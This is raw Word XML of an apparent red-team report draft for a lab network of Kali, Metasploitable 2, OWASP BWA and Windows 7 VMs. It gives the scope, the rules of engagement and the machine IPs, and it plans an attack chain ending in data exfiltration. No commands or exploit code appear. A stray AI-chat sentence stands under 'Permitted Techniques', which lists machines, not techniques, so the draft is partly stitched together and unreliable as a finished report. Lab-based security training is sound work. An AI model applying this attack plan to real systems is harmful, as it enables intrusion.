      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ABCD Ltd is a UK</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>based mid</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>sized organisation providing web</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>facing retail services and internal corporate systems. As part of its cyber</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>resilience strategy, the company commissioned a controlled red</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>team engagement to evaluate its exposure to realistic adversary behaviour. Unlike a traditional penetration test, which focuses on vulnerability identification, a red</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>team assessment aims to emulate the tactics, techniques, and procedures (TTPs) of real threat actors to test the organisation’s detection, prevention, and response capabilities across the full attack lifecycle (MITRE, 2024).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF4747" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21BE426A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This assessment was executed within a VirtualBox</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">based lab environment designed to replicate a simplified version of ABCD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Ltd’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> infrastructure. The environment includes four machines representing distinct organisational roles</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B06AB43" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="004708CB">
        <w:t>Kali Linux attacker machine (192.168.56.104)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E4D924" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004708CB">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004708CB">
        <w:t xml:space="preserve"> 2 vulnerable Linux server (192.168.56.101)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6B35F0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="004708CB">
        <w:t>OWASP Broken Web Application (BWA) server (192.168.56.102)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B00F555" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="004708CB">
        <w:t>Windows 7 workstation (192.168.56.103)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED079BF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="7EDB733E" w14:textId="1826DCEE" w:rsidR="00C934DB" w:rsidRPr="00DE2AA0" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004708CB">
        <w:t xml:space="preserve">The objective of the engagement was to demonstrate a complete attack chain, beginning with </w:t>
      </w:r>
      <w:r w:rsidR="002E2555">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:t>exploitation of a public</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:t xml:space="preserve">facing web application, followed by privilege escalation and lateral movement, and culminating in the exfiltration of sensitive data from the Windows 7 host. The </w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:lastRenderedPageBreak/>
        <w:t>assessment prioritised stealth, realistic attacker behaviour, and adherence to ethical and legal constraints</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E11014" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C32A12A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="00DE2AA0" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2AA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Rules of Engagement (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE2AA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RoE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE2AA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D9031" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="00F55560" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00F55560">
        <w:t xml:space="preserve">The Rules of Engagement define the boundaries, expectations, and legal/ethical constraints governing the assessment. They ensure that all activities are authorised, controlled, and aligned with ABCD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F55560">
        <w:t>Ltd’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F55560">
        <w:t xml:space="preserve"> risk appetite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717F68A4" w14:textId="77777777" w:rsidR="00266334" w:rsidRDefault="00266334" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE2682D" w14:textId="795CA052" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.1 Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E0CD85" w14:textId="4796A59F" w:rsidR="00C934DB" w:rsidRPr="00266334" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scope systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62390D3A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004708CB">
        <w:t>Kali Linux attacker VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BD66D3" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004708CB">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004708CB">
        <w:t xml:space="preserve"> 2 server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1E970E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004708CB">
        <w:t>OWASP BWA server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2295A4DE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004708CB">
        <w:t>Windows 7 workstation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E295A3" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="004708CB">
        <w:t>VirtualBox Host</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:t>Only Network (192.168.56.0/24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9388DF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="004708CB">
        <w:t>Out</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="004708CB">
        <w:t>scope systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F6BA1D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="004708CB">
        <w:t>Host operating system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4EC1FA" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="004708CB">
        <w:t>Hypervisor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E746CB0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="004708CB">
        <w:t>External networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237A5FC0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="004708CB">
        <w:t>Real user accounts or production data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B80AFD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="50F5E4DF" w14:textId="68FD2F9B" w:rsidR="00C934DB" w:rsidRPr="00774A59" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00774A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.2 Permitted Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A30AF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>You’ve</w:t>
      </w:r>
      <w:r w:rsidRPr="00697D7D">
        <w:t xml:space="preserve"> essentially built a complete, realistic internal network for your red</w:t>
      </w:r>
      <w:r w:rsidRPr="00697D7D">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00697D7D">
        <w:t>team report. Here</w:t>
      </w:r>
      <w:r w:rsidRPr="00697D7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00697D7D">
        <w:t>s a clean, structured way to present it, and how these IPs fit into each phase of your engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130A4BBF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>The following offensive techniques are authorised</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3080"/>
        <w:gridCol w:w="3081"/>
        <w:gridCol w:w="3081"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C934DB" w14:paraId="3C382B13" w14:textId="77777777" w:rsidTr="00D617DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3080" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D088B46" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:r>
              <w:t xml:space="preserve">Machine </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BD3A857" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:r>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21EDD604" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:r>
              <w:t>IP address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C934DB" w14:paraId="16C3E64E" w14:textId="77777777" w:rsidTr="00D617DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3080" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51D946A7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:r>
              <w:t xml:space="preserve">Kali  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17784AD7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:r>
              <w:t>Attacker / Red team operator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CDBC93B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:r>
              <w:t>192.168.56.104</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C934DB" w14:paraId="08F34B1E" w14:textId="77777777" w:rsidTr="00D617DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3080" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7466FA33" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Metasploitable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D997BC0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Vulnrable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">  server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="742D4D16" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:r>
              <w:t>192.168.56.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C934DB" w14:paraId="5147C0D1" w14:textId="77777777" w:rsidTr="00D617DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3080" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="789576C4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Owasp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> bwa </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18FA383D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:r>
              <w:t xml:space="preserve">Web application vulnerability platform </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="524C3987" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:r>
              <w:t>192.168.56.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C934DB" w14:paraId="1964428F" w14:textId="77777777" w:rsidTr="00D617DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3080" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48BCE46C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:r>
              <w:t>Windows 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1193DC8D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:r>
              <w:t xml:space="preserve">Workstation target </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7080D47A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
            <w:r>
              <w:t>192.168.56.103</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C934DB" w14:paraId="2EC96E6D" w14:textId="77777777" w:rsidTr="00D617DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3080" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="365A33B4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D7E4C5E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31449308" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C934DB" w14:paraId="4921F6E6" w14:textId="77777777" w:rsidTr="00D617DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3080" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="009E213F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D6E129A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12CC77F0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37099EB0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="298CF0ED" w14:textId="77777777" w:rsidR="00595FDC" w:rsidRDefault="00595FDC" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62611049" w14:textId="77777777" w:rsidR="00595FDC" w:rsidRDefault="00595FDC" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54EE087E" w14:textId="77777777" w:rsidR="00595FDC" w:rsidRDefault="00595FDC" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07198435" w14:textId="40BAAF90" w:rsidR="00C934DB" w:rsidRPr="003D1ABC" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK3"/>
      <w:r w:rsidRPr="003D1ABC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reconnaissance (Nmap from Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F1968E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>From Kali (192.168.56.104):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6729B35B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="45D287F2" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00F86025">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F1325E6" wp14:editId="2C14D79E">
            <wp:extent cx="2252949" cy="1798225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1410402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402478" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
